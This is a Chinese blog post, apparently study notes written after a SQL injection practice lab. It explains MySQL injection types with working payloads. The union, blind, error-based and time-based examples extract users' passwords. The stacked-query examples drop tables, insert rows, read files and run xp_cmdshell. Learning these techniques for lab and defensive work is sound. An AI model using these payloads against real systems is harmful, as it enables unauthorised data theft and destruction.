

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#ccccff">
  <meta name="author" content="echozt">
  <meta name="keywords" content="网络安全，计算机，渗透">
  
    <meta name="description" content="打完65关的sql靶场，浅浅地整理了一下关于sql注入的知识点。主要是mysql数据库的。">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入知识点详解">
<meta property="og:url" content="https://echozt.github.io/posts/b737.html">
<meta property="og:site_name" content="echozt">
<meta property="og:description" content="打完65关的sql靶场，浅浅地整理了一下关于sql注入的知识点。主要是mysql数据库的。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://echozt.github.io/posts/b737/1.png">
<meta property="article:published_time" content="2022-04-13T15:15:01.000Z">
<meta property="article:modified_time" content="2022-09-05T12:36:54.287Z">
<meta property="article:author" content="echozt">
<meta property="article:tag" content="sql注入">
<meta property="article:tag" content="web漏洞">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://echozt.github.io/posts/b737/1.png">
  
  
  <title>sql注入知识点详解 - echozt</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/bynotes/texiao/source/css/toubudaziji.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/bynotes/texiao/source/css/daziyanse.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"echozt.github.io","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":100,"cursorChar":"_","loop":true},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":1},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.1"><link rel="alternate" href="/atom.xml" title="echozt" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>echozt&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default2.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="sql注入知识点详解">
              
            </span>

            
              <div class="mt-3">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-author" aria-hidden="true"></i>
      echozt
    </span>
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-04-13 23:15" pubdate>
        2022年4月13日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      4.4k 字
    </span>
  

  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">sql注入知识点详解</h1>
            
            <div class="markdown-body">
              <p>打完65关的sql靶场，浅浅地整理了一下关于sql注入的知识点。主要是mysql数据库的。</p>
<span id="more"></span>

<!--more-->

<h1 id="MySQL"><a href="#MySQL" class="headerlink" title="MySQL"></a>MySQL</h1><p>● 字段table_schema记录库名，table_name记录表名，column_name记录字段名</p>
<p>● 在 mysql5 版本以后，mysql 默认在数据库中存放在一个叫 infomation_schema 里面</p>
<p>● 这个库里面有很多表重点是这三个表 columns 、tables、schemata</p>
<pre class="line-numbers language-bash"><code class="language-bash">columns  存储该用户创建的所有数据库的库名、表名和字段名。

tables   表字段table_schema 、table_name 分别记录着库名和表名

schemata 表字段schema_name 记录着库的信息
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h1 id="常用函数："><a href="#常用函数：" class="headerlink" title="常用函数："></a>常用函数：</h1><ol>
<li><p>version()——MySQL 版本</p>
</li>
<li><p>user()——数据库用户名</p>
</li>
<li><p>database()——数据库名</p>
</li>
<li><p>@@datadir——数据库路径</p>
</li>
<li><p>@@version_compile_os——操作系统版本</p>
</li>
</ol>
<h1 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>sql注入</h1><h3 id="1、sql注入原理"><a href="#1、sql注入原理" class="headerlink" title="1、sql注入原理"></a>1、sql注入原理</h3><p>● 参数用户可控</p>
<p>● 参数带入数据库查询</p>
<h3 id="2、判断是否存在注入"><a href="#2、判断是否存在注入" class="headerlink" title="2、判断是否存在注入"></a>2、判断是否存在注入</h3><p>● 数字型注入：/1 和 /0回显不一样。或者传入id=1 and 1=1 和id=1 and 1=2回显不一样等等</p>
<p>● 字符型注入：’ 和 ‘’ 回显不一样，单数的和双数的单引号回显规不规律</p>
<h3 id="3、注释符"><a href="#3、注释符" class="headerlink" title="3、注释符"></a>3、注释符</h3><p>● 单行注释：减减加(–+)，减减空格(– )，#</p>
<p>● 多行注释：/<em>……</em>/</p>
<h1 id="sql注入分类"><a href="#sql注入分类" class="headerlink" title="sql注入分类"></a>sql注入分类</h1><h2 id="1、union联合注入"><a href="#1、union联合注入" class="headerlink" title="1、union联合注入"></a>1、union联合注入</h2><p>含义：联合查询注入是联合两个表进行注入攻击，使用关键词 union select 对两个表进行联合查询。两个表的字段数要相同，不然会出现报错。</p>
<h4 id="●-Limit"><a href="#●-Limit" class="headerlink" title="● Limit"></a>● Limit</h4><p>Limit是指限定查询的条数。有三种方式：</p>
<h5 id="方式一：limit-参数1"><a href="#方式一：limit-参数1" class="headerlink" title="方式一：limit 参数1"></a>方式一：limit 参数1</h5><p>参数1可从1开始，往后递增，表示要查询几条数据。</p>
<p>例如，limit 1 表示限定查询一条语句。</p>
<h5 id="方式二：limit-参数1，参数2"><a href="#方式二：limit-参数1，参数2" class="headerlink" title="方式二：limit 参数1，参数2"></a>方式二：limit 参数1，参数2</h5><p>参数1从0开始，表示从第几行（按照索引0作第一行）开始查询，参数2表示要查询的条数。合在一起的意思就是，从参数1开始，查询参数2条语句。</p>
<p>例如，limit 0,1 表示查询第一条语句，和limit 1等意。</p>
<h5 id="方式三：limit-参数1-offset-参数2"><a href="#方式三：limit-参数1-offset-参数2" class="headerlink" title="方式三：limit 参数1 offset 参数2"></a>方式三：limit 参数1 offset 参数2</h5><p>参数1表示限定要查询几条，参数2表示从第几行（按照索引为0作第一行）开始查询。</p>
<p>例如：limit 1 offset 0 表示查询第一条参数。</p>
<h3 id="（1）判断"><a href="#（1）判断" class="headerlink" title="（1）判断"></a>（1）判断</h3><p>传入1正常，传入1’报错</p>
<p>传入1’ and ‘1’=’1 和传入 1’ and ‘1’=’2  页面回显不一样</p>
<h3 id="（2）判断字段数"><a href="#（2）判断字段数" class="headerlink" title="（2）判断字段数"></a>（2）判断字段数</h3><p>公式：order by n-1    到n出错时，则字段数为n-1</p>
<h3 id="（3）获取敏感信息"><a href="#（3）获取敏感信息" class="headerlink" title="（3）获取敏感信息"></a>（3）获取敏感信息</h3><p> -1 union select 1,2–+</p>
<p> (-1是让前面的表查询的内容不存在，将1或2可替换成version(),database(),user()等）</p>
<pre class="line-numbers language-bash"><code class="language-bash">例1：-1<span class="token string">' union select 1,user()

例2：-1'</span> union <span class="token keyword">select</span> 1,group_concat<span class="token punctuation">(</span>user<span class="token punctuation">(</span><span class="token punctuation">)</span>,0x3a,database<span class="token punctuation">(</span><span class="token punctuation">))</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h3 id="（4）获取表"><a href="#（4）获取表" class="headerlink" title="（4）获取表"></a>（4）获取表</h3><pre class="line-numbers language-bash"><code class="language-bash">-1' union <span class="token keyword">select</span> 1,<span class="token punctuation">(</span>select table_name from information_schema.tables where table_schema<span class="token operator">=</span>database<span class="token punctuation">(</span><span class="token punctuation">)</span> limit 0,1<span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="（5）获取字段"><a href="#（5）获取字段" class="headerlink" title="（5）获取字段"></a>（5）获取字段</h3><pre class="line-numbers language-bash"><code class="language-bash">-1’ union <span class="token keyword">select</span> 1,<span class="token punctuation">(</span>select column_name from information_schema.columns where table_name<span class="token operator">=</span><span class="token string">'users'</span> limit 0,1<span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="（6）查询某个表的内容"><a href="#（6）查询某个表的内容" class="headerlink" title="（6）查询某个表的内容"></a>（6）查询某个表的内容</h3><h5 id="例如：获取users表的user和password"><a href="#例如：获取users表的user和password" class="headerlink" title="例如：获取users表的user和password"></a>例如：获取users表的user和password</h5><pre class="line-numbers language-bash"><code class="language-bash">-1' union <span class="token keyword">select</span> 1,<span class="token punctuation">(</span>select group_concat<span class="token punctuation">(</span>user,0x3a,password<span class="token punctuation">)</span> from <span class="token function">users</span> limit 1<span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h2 id="2、Boolean布尔型盲注"><a href="#2、Boolean布尔型盲注" class="headerlink" title="2、Boolean布尔型盲注"></a>2、Boolean布尔型盲注</h2><p>含义：在页面中不会显示数据库信息，一般情况下只会显示对与错的内容。</p>
<h4 id="if-1-1-1-0"><a href="#if-1-1-1-0" class="headerlink" title="if(1=1,1,0)"></a>if(1=1,1,0)</h4><p>● if(参数1，参数2，参数3）</p>
<p>● 参数1是语句，参数2表示正确时显示，参数3表示错误时显示</p>
<h4 id="substr"><a href="#substr" class="headerlink" title="substr"></a>substr</h4><p>● substr(参数1，参数2，参数3）</p>
<p>● 参数1是字符串，参数2是开始截取（索引从1开始），参数3是截取的长度</p>
<h3 id="（1）判断-1"><a href="#（1）判断-1" class="headerlink" title="（1）判断"></a>（1）判断</h3><p>传入1正常，传入1’报错</p>
<p>传入1’ and ‘1’=’1 和传入 1’ and ‘1’=’2  页面回显不一样</p>
<h3 id="（2）获取敏感信息"><a href="#（2）获取敏感信息" class="headerlink" title="（2）获取敏感信息"></a>（2）获取敏感信息</h3><pre class="line-numbers language-bash"><code class="language-bash">1<span class="token string">' and if(substr(user(),1,1)='</span>a',1,0<span class="token punctuation">)</span>--+

判断数据库用户名第一个字符是否为a，是则返回1，否则返回0
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h3 id="（3）获取数据库名"><a href="#（3）获取数据库名" class="headerlink" title="（3）获取数据库名"></a>（3）获取数据库名</h3><pre class="line-numbers language-bash"><code class="language-bash">1<span class="token string">' and if(substr(database(),1,1)='</span>a',1,0<span class="token punctuation">)</span>--+

可抓包对变量1：长度，变量2：a~zA~Z0~9._@  这两个变量进行爆破
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h3 id="（4）获取表名"><a href="#（4）获取表名" class="headerlink" title="（4）获取表名"></a>（4）获取表名</h3><pre class="line-numbers language-bash"><code class="language-bash">1’ and if<span class="token punctuation">(</span>substr<span class="token punctuation">((</span>select table_name from information_schema.tables where table_schema<span class="token operator">=</span>database<span class="token punctuation">(</span><span class="token punctuation">)</span> limit 1<span class="token punctuation">)</span>,1,1<span class="token punctuation">)</span><span class="token operator">=</span><span class="token string">'a'</span>,1,0<span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="（5）获取字段名"><a href="#（5）获取字段名" class="headerlink" title="（5）获取字段名"></a>（5）获取字段名</h3><pre class="line-numbers language-bash"><code class="language-bash">1<span class="token string">' and if(substr((select column_name form information_schema.columns where table_name='</span><span class="token function">users</span><span class="token string">' limit 1,1),1,1)='</span>a',1,0<span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="（6）获取表的内容"><a href="#（6）获取表的内容" class="headerlink" title="（6）获取表的内容"></a>（6）获取表的内容</h3><pre class="line-numbers language-bash"><code class="language-bash">1’ and if<span class="token punctuation">(</span>substr<span class="token punctuation">((</span>select concat<span class="token punctuation">(</span>user,0x3a,password<span class="token punctuation">)</span>from <span class="token function">users</span> limit 1<span class="token punctuation">)</span>,1,1<span class="token punctuation">)</span><span class="token operator">=</span><span class="token string">'a'</span>,1,0<span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h2 id="3、报错注入"><a href="#3、报错注入" class="headerlink" title="3、报错注入"></a>3、报错注入</h2><p>含义：数据库显错是指，数据库在执行时，遇到语法不对，会显示报错信息。</p>
<h3 id="（1）判断-2"><a href="#（1）判断-2" class="headerlink" title="（1）判断"></a>（1）判断</h3><p>输入单引号 如果报错有可能存在报错注入，如果拼接 SQL 语句带入到 mysql 执行即存在报错注入</p>
<h3 id="（2）获取库名"><a href="#（2）获取库名" class="headerlink" title="（2）获取库名"></a>（2）获取库名</h3><pre class="line-numbers language-bash"><code class="language-bash">1' and info<span class="token punctuation">(</span><span class="token punctuation">)</span>--+

原理：会报错显示当前库（库名会显示出来）不存在这个函数
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h3 id="（3）获取敏感信息-1"><a href="#（3）获取敏感信息-1" class="headerlink" title="（3）获取敏感信息"></a>（3）获取敏感信息</h3><h4 id="●-updatexml-函数"><a href="#●-updatexml-函数" class="headerlink" title="● updatexml()函数"></a>● updatexml()函数</h4><pre class="line-numbers language-bash"><code class="language-bash">1' and updatexml<span class="token punctuation">(</span>1,concat<span class="token punctuation">(</span>0x7e,<span class="token punctuation">(</span>select user<span class="token punctuation">(</span><span class="token punctuation">))</span>,0x7e<span class="token punctuation">)</span>,1<span class="token punctuation">)</span>--+

可将user<span class="token punctuation">(</span><span class="token punctuation">)</span>换成database<span class="token punctuation">(</span><span class="token punctuation">)</span>，version<span class="token punctuation">(</span><span class="token punctuation">)</span>等
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h4 id="●-extractvalue-函数"><a href="#●-extractvalue-函数" class="headerlink" title="● extractvalue()函数"></a>● extractvalue()函数</h4><pre class="line-numbers language-bash"><code class="language-bash">1' and extractvalue<span class="token punctuation">(</span>1,concat<span class="token punctuation">(</span>0x7e,<span class="token punctuation">(</span>select user<span class="token punctuation">(</span><span class="token punctuation">))</span>,0x7e<span class="token punctuation">))</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h4 id="●-floor-函数"><a href="#●-floor-函数" class="headerlink" title="● floor()函数"></a>● floor()函数</h4><pre class="line-numbers language-bash"><code class="language-bash">1' and <span class="token punctuation">(</span>select count<span class="token punctuation">(</span>*<span class="token punctuation">)</span> from information_schema.tables group by concat<span class="token punctuation">(</span>0x7e,<span class="token punctuation">(</span>select user<span class="token punctuation">(</span><span class="token punctuation">))</span>,0x7e,floor<span class="token punctuation">(</span>rand<span class="token punctuation">(</span>0<span class="token punctuation">)</span>*2<span class="token punctuation">))</span><span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h2 id="4、时间注入（延时注入，基于时间的SQL盲注）"><a href="#4、时间注入（延时注入，基于时间的SQL盲注）" class="headerlink" title="4、时间注入（延时注入，基于时间的SQL盲注）"></a>4、时间注入（延时注入，基于时间的SQL盲注）</h2><p>含义：时间注入又名延时注入，属于盲注入的一种，通常是某个注入点无法通过布尔型注入获取数据而采用一种突破注入的技巧。跟布尔型差不多，只是将布尔型如果成功显示1换成如果成功延时多少秒。</p>
<h4 id="sleep"><a href="#sleep" class="headerlink" title="sleep()"></a>sleep()</h4><p>sleep() 是延时的意思，sleep(10)就是数据库延时10 秒返回内容。</p>
<h3 id="（1）判断-3"><a href="#（1）判断-3" class="headerlink" title="（1）判断"></a>（1）判断</h3><pre class="line-numbers language-bash"><code class="language-bash">id<span class="token operator">=</span>1' and sleep<span class="token punctuation">(</span>5<span class="token punctuation">)</span>--+  存在延时
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="（2）获取敏感信息-1"><a href="#（2）获取敏感信息-1" class="headerlink" title="（2）获取敏感信息"></a>（2）获取敏感信息</h3><pre class="line-numbers language-bash"><code class="language-bash">1<span class="token string">' and if(substr(user(),1,1)='</span>a',sleep<span class="token punctuation">(</span>5<span class="token punctuation">)</span>,0<span class="token punctuation">)</span>--+

判断数据库用户名第一个字符是否为a，是则返回1，否则返回0
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h3 id="（3）获取数据库名-1"><a href="#（3）获取数据库名-1" class="headerlink" title="（3）获取数据库名"></a>（3）获取数据库名</h3><pre class="line-numbers language-bash"><code class="language-bash">1<span class="token string">' and if(substr(database(),1,1)='</span>s',sleep<span class="token punctuation">(</span>5<span class="token punctuation">)</span>,0<span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h2 id="5、堆叠注入（多语句查询注入）"><a href="#5、堆叠注入（多语句查询注入）" class="headerlink" title="5、堆叠注入（多语句查询注入）"></a>5、堆叠注入（多语句查询注入）</h2><p>含义：可以执行多条sql语句，语句之间以分号隔开。</p>
<p>堆叠注入主要用来实现数据库的增删查改操作：</p>
<h3 id="MySQL："><a href="#MySQL：" class="headerlink" title="MySQL："></a>MySQL：</h3><h4 id="（1）新建一个表"><a href="#（1）新建一个表" class="headerlink" title="（1）新建一个表"></a>（1）新建一个表</h4><pre class="line-numbers language-bash"><code class="language-bash">Select * from <span class="token function">users</span> where id<span class="token operator">=</span>1<span class="token punctuation">;</span>create table <span class="token function">test</span> like <span class="token function">users</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h4 id="（2）删除表"><a href="#（2）删除表" class="headerlink" title="（2）删除表"></a>（2）删除表</h4><pre class="line-numbers language-bash"><code class="language-bash">Select * from <span class="token function">users</span> where id<span class="token operator">=</span>1<span class="token punctuation">;</span>drop table <span class="token function">test</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h4 id="（3）查询数据"><a href="#（3）查询数据" class="headerlink" title="（3）查询数据"></a>（3）查询数据</h4><pre class="line-numbers language-bash"><code class="language-bash">Select * from <span class="token function">users</span> where id<span class="token operator">=</span>1<span class="token punctuation">;</span><span class="token keyword">select</span> 1,2,3<span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h4 id="（4）加载文件"><a href="#（4）加载文件" class="headerlink" title="（4）加载文件"></a>（4）加载文件</h4><pre class="line-numbers language-bash"><code class="language-bash">Select * from <span class="token function">users</span> where id<span class="token operator">=</span>1<span class="token punctuation">;</span><span class="token keyword">select</span> load_file<span class="token punctuation">(</span><span class="token string">'C:/1.php'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h4 id="（5）修改数据"><a href="#（5）修改数据" class="headerlink" title="（5）修改数据"></a>（5）修改数据</h4><pre class="line-numbers language-bash"><code class="language-bash">Select * from <span class="token function">users</span> where id<span class="token operator">=</span>1<span class="token punctuation">;</span>insert into users<span class="token punctuation">(</span>id,username,password<span class="token punctuation">)</span> values<span class="token punctuation">(</span><span class="token string">'100'</span>,<span class="token string">'new'</span>,<span class="token string">'new'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="SqlServer："><a href="#SqlServer：" class="headerlink" title="SqlServer："></a>SqlServer：</h3><h4 id="（1）新建一个表-1"><a href="#（1）新建一个表-1" class="headerlink" title="（1）新建一个表"></a>（1）新建一个表</h4><pre class="line-numbers language-bash"><code class="language-bash"><span class="token keyword">select</span> * from <span class="token function">test</span><span class="token punctuation">;</span>create table sc3<span class="token punctuation">(</span>ss CHAR<span class="token punctuation">(</span>8<span class="token punctuation">))</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h4 id="（2）删除表-1"><a href="#（2）删除表-1" class="headerlink" title="（2）删除表"></a>（2）删除表</h4><pre class="line-numbers language-bash"><code class="language-bash"><span class="token keyword">select</span> * from <span class="token function">test</span><span class="token punctuation">;</span>drop table sc3<span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h4 id="（3）查询数据-1"><a href="#（3）查询数据-1" class="headerlink" title="（3）查询数据"></a>（3）查询数据</h4><pre class="line-numbers language-bash"><code class="language-bash"><span class="token keyword">select</span> 1,2,3<span class="token punctuation">;</span><span class="token keyword">select</span> * from <span class="token function">test</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h4 id="（4）修改数据"><a href="#（4）修改数据" class="headerlink" title="（4）修改数据"></a>（4）修改数据</h4><pre class="line-numbers language-bash"><code class="language-bash"><span class="token keyword">select</span> * from <span class="token function">test</span><span class="token punctuation">;</span>update <span class="token function">test</span> <span class="token keyword">set</span> name<span class="token operator">=</span><span class="token string">'test'</span> where id<span class="token operator">=</span>3<span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h4 id="（5）存储过程的执行"><a href="#（5）存储过程的执行" class="headerlink" title="（5）存储过程的执行"></a>（5）存储过程的执行</h4><pre class="line-numbers language-bash"><code class="language-bash"><span class="token keyword">select</span> * from <span class="token function">test</span> where id<span class="token operator">=</span>1<span class="token punctuation">;</span><span class="token function">exec</span> master<span class="token punctuation">..</span>xp_cmdshell <span class="token string">'ipconfig'</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="Oracle不能使用堆叠注入"><a href="#Oracle不能使用堆叠注入" class="headerlink" title="Oracle不能使用堆叠注入"></a>Oracle不能使用堆叠注入</h3><h3 id="Postgresql："><a href="#Postgresql：" class="headerlink" title="Postgresql："></a>Postgresql：</h3><h4 id="（1）新建一个表-2"><a href="#（1）新建一个表-2" class="headerlink" title="（1）新建一个表"></a>（1）新建一个表</h4><pre class="line-numbers language-bash"><code class="language-bash"><span class="token keyword">select</span> * from user_test<span class="token punctuation">;</span>create table user_data<span class="token punctuation">(</span>id DATE<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h4 id="（2）删除表-2"><a href="#（2）删除表-2" class="headerlink" title="（2）删除表"></a>（2）删除表</h4><pre class="line-numbers language-bash"><code class="language-bash"><span class="token keyword">select</span> * from user_test<span class="token punctuation">;</span>delete from user_data<span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h4 id="（3）查询数据-2"><a href="#（3）查询数据-2" class="headerlink" title="（3）查询数据"></a>（3）查询数据</h4><pre class="line-numbers language-bash"><code class="language-bash"><span class="token keyword">select</span> * from user_test<span class="token punctuation">;</span><span class="token keyword">select</span> 1,2,3<span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h4 id="（4）修改数据-1"><a href="#（4）修改数据-1" class="headerlink" title="（4）修改数据"></a>（4）修改数据</h4><pre class="line-numbers language-bash"><code class="language-bash"><span class="token keyword">select</span> * from user_test<span class="token punctuation">;</span>update user_test <span class="token keyword">set</span> name<span class="token operator">=</span><span class="token string">'modify'</span> where name<span class="token operator">=</span><span class="token string">'张三'</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h2 id="6、二次注入"><a href="#6、二次注入" class="headerlink" title="6、二次注入"></a>6、二次注入</h2><p>含义：将可能导致sql 注入的字符先存入到数据库中，当再次调用这个恶意构造的字符时，就可以触发sql注入。</p>
<p>原理：插入恶意数据库——&gt;引用恶意数据</p>
<h2 id="7、宽字节注入"><a href="#7、宽字节注入" class="headerlink" title="7、宽字节注入"></a>7、宽字节注入</h2><p>产生原因：数据库编码与PHP编码设置为不同的两个编码。</p>
<p> Big5和GBK字符集有可能会存在宽字节注入，utf-8和gb2312没有。Mysql在使用GBK编码时，会认为两个字符为一个汉字。</p>
<h4 id="思路一："><a href="#思路一：" class="headerlink" title="思路一："></a>思路一：</h4><p>%df吃掉\  原因在于urldecode(‘)=%5c%27,而我们在前面添加%df，就形成了%df%5c%27,mysql在GBK编码中前两个字当做一个汉字，此时%27就会作为一个单独的字符，也就是’</p>
<h4 id="思路二："><a href="#思路二：" class="headerlink" title="思路二："></a>思路二：</h4><p>将&#39;中的\过滤掉。可以构造%**%5c%5c%27，后面的%5c会被前面的%5c给注释掉。</p>
<h1 id="思维导图"><a href="#思维导图" class="headerlink" title="思维导图"></a>思维导图</h1><p>最后放张上面知识的思维导图版吧</p>
<img src="/posts/b737/1.png" srcset="/img/loading.gif" lazyload class>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/web%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E6%80%BB%E7%BB%93/">web漏洞原理总结</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/sql%E6%B3%A8%E5%85%A5/">sql注入</a>
                    
                      <a class="hover-with-bg" href="/tags/web%E6%BC%8F%E6%B4%9E/">web漏洞</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/posts/6011.html">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">pikachu靶场</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
